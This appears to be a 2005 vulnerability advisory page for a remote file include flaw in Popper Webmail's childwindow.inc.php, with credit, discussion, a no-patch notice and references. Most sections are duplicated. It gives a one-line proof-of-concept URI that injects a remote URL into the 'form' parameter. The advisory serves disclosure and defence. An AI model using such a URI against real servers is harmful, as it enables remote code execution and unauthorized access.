Popper Webmail ChildWindow.Inc.PHP Remote File Include Vulnerability
BID:13851
Info
Popper Webmail ChildWindow.Inc.PHP Remote File Include Vulnerability
| Bugtraq ID: | 13851 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 03 2005 12:00AM |
| Updated: | Jun 03 2005 12:00AM |
| Credit: | The discovery of this vulnerability is credited to Leon Juranic <[email protected]>. |
| Vulnerable: |
Popper Popper 1.41 -r2 |
| Not Vulnerable: | |
Discussion
Popper Webmail ChildWindow.Inc.PHP Remote File Include Vulnerability
Popper is affected by a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
Popper is affected by a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
Exploit / POC
Popper Webmail ChildWindow.Inc.PHP Remote File Include Vulnerability
No exploit is required.
The following proof of concept URI is available:
http://www.example.com/popper/childwindow.inc.php?form=http://www.example.com/test
No exploit is required.
The following proof of concept URI is available:
http://www.example.com/popper/childwindow.inc.php?form=http://www.example.com/test
Solution / Fix
Popper Webmail ChildWindow.Inc.PHP Remote File Include Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Popper Webmail ChildWindow.Inc.PHP Remote File Include Vulnerability
References:
References:
- LSS Security Advisory #LSS-2005-06-07 (LSS Security)
- LSS.hr false positives (b0iler
) - Popper Homepage (Popper)
- Re: LSS.hr false positives. (correction) (Leon Juranic
) - Popper webmail remote code execution vulnerability - advisory fix (LSS Security
)